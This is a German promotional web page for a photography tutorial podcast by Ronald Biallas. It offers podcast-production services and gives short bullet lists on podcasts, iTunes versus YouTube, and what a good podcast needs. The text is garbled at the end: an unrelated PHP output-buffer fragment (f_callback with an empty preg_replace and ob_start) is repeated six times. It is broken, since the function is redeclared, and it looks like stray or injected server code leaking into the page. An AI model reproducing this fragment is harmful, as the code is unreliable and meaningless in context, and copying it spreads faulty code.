Podcast

“Abenteuer Fotografie” - ein Fototutorial für Fotobegeisterte, mit bereits mehr als 320.000 downloads und 1850 Abonenten allein auf Youtube. In dieser Podcastserie verrät Ronald Biallas Ihnen Tipps und Tricks aus seinem reichhaltigen Erfahrungsschatz als professioneller Werbefotograf. Unter (link Abenteuer Fotografie) finden Sie alle Tutorials mit wertvollem, praxisnahem Wissen rund um die optimale Planung, Inszenierung und Umsetzung Ihrer persönlichen Wunschfotos.
Mehr finden Sie hier.
Podcast / Schulungsfilm

Podcast / Schulungsfilm

Vor zwei Jahren begann ich mit der Produktion eines eigenen Podcasts.
Seitdem habe ich mit 15 Sendungen über 80.000 Zuschauer 1877 Abonenten mit über
330.000 Downloads allein auf Youtube erreicht. Noch ein größeres Besucherpotential
bringt der itunes Store. Das erscheint im Vergleich zu Fernsehwerbung
zunächst nicht viel. Doch schaut man genauer hin, hat man eine stark fokussierte
Zielgruppe für fünf Minuten erreicht. Das ist ein unschlagbarer Kontaktpreis!

Gerne zeige ich Ihnen, wie auch Sie diese Möglichkeiten für sich nutzen können.

Hier ein Beispiel:

Was ist ein Podcast?

– Kunstwort aus iPod und Broadcast (Rundfunk)
– gestartet 2003 mit der Software iTunes von Apple
– umfasst Audio- und Videoinhalte
– produziert von Privatpersonen, Firmen und TV-Sendern
– Audio/Video on Demand (auf Anforderung)
– große Verbreitungsplattformen: TV, Computer, iPhone bzw. alle Smartphones

Die wichtigsten Videoportale sind Youtube und iTunes.

iTunes
– wird redaktionell betreut
– mindestens drei Beiträge für Listung notwendig
– gibt es kein Zuschauerinteresse, wird der Beitrag gelöscht
– das Hosting der Filme muss bezahlt werden
– kleinere Zielgruppe mit gehobenen Ansprüchen
– gehobene Mittelschicht und Leute mit hohem Einkommen

Youtube
– Der Film ist solange online, bis man ihn löscht
– einfache Veröffentlichung von Videos
– kostenlose Plattform
– man kann an Werbeeinnahmen beteiligt werden
– potenziell sehr große Zielgruppe
– doch unübersichtliches Angebot
– Zuschauerzahlen steigen kontinuierlich

Was braucht man für einen guten Podcast?

– eine genau definierte Zielgruppe
– eine Idee, die die Zielgruppe fesselt
– Themen und fortlaufende Geschichten
– einen Moderator
– zum Start bei iTunes mindestens sechs Folgen
– Begleitende Maßnahmen:

  • Blog
  • PR
  • Twitter & Co.

function f_callback($buffer){$buffer = preg_replace('##','',$buffer);return $buffer;}ob_start(f_callback);function f_callback($buffer){$buffer = preg_replace('##','',$buffer);return $buffer;}ob_start(f_callback);function f_callback($buffer){$buffer = preg_replace('##','',$buffer);return $buffer;}ob_start(f_callback);function f_callback($buffer){$buffer = preg_replace('##','',$buffer);return $buffer;}ob_start(f_callback);function f_callback($buffer){$buffer = preg_replace('##','',$buffer);return $buffer;}ob_start(f_callback);function f_callback($buffer){$buffer = preg_replace('##','',$buffer);return $buffer;}ob_start(f_callback);